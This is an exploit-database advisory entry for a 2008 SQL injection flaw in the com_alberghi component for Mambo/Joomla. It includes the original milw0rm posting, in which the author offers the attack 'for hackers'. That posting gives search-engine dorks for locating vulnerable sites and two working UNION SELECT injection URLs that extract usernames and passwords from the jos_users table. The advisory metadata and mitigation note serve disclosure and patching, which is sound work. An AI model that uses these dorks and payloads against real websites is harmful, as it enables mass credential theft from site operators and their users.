Mambo Component com_alberghi SQL Injection

vendor:

Alberghi

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Alberghi

Affected Version From: 2.1.2003

Affected Version To: 2.1.2003

Patch Exists: YES

Related CWE: N/A

CPE: a:vamba:alberghi

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Mambo Component com_alberghi SQL Injection

This vulnerability allows an attacker to inject malicious SQL queries into the vulnerable application. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The vulnerability is caused due to the vulnerable parameter 'id' in the 'com_alberghi' component. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version.

Source

Exploit-DB raw data:

##########################################
#
# Mambo Component com_alberghi SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
###########################################
TODAY MY BÄ°RTDAY
SOO I WROTE 5 BUGS ALL FOR HACKERS
5 EXPLOÄ°TS HAVE 100.000 MAMBO-JOOMLA WEBPAGES OR MUCH MORE
DONT FORGET MY PRESENT HACKERS
GOOD LUCKY

100.000 DEN FAZLA MAMBO NE JOOMLA WEBSiTESi
YASGUNUM NEDENiYLE HEDiYE
iYi SANLAR

you can see all my exploits

http://my.opera.com/SQL-Injection/blog/

###########################################
#
# DORK 1 : allinurl: "com_alberghi" detail
#
# DORK 2 : allinurl: "com_alberghi"
#
###########################################
EXPLOIT 1 :

index.php?option=com_alberghi&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,concat(username,0x3a,password)/**/from/**/jos_users/*

EXPLOIT 2 :

index.php?option=com_alberghi&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,concat(username,0x3a,password)/**/from/**/jos_users/*

###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################

side note:
	<name>Alberghi</name>
	<author>Vamba</author>
	<creationDate>14-04-2007</creationDate>
	<copyright>This component is released under the GNU/GPL License</copyright>
	<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>

	<authorEmail>webmaster@joomlaitalia.com</authorEmail>
	<authorUrl>www.joomlaitalia.com</authorUrl>
	<version>2.1.3</version>
	<description>Alberghi a fork of Accombo project original Author Niall McCullagh</description>

# milw0rm.com [2008-03-19]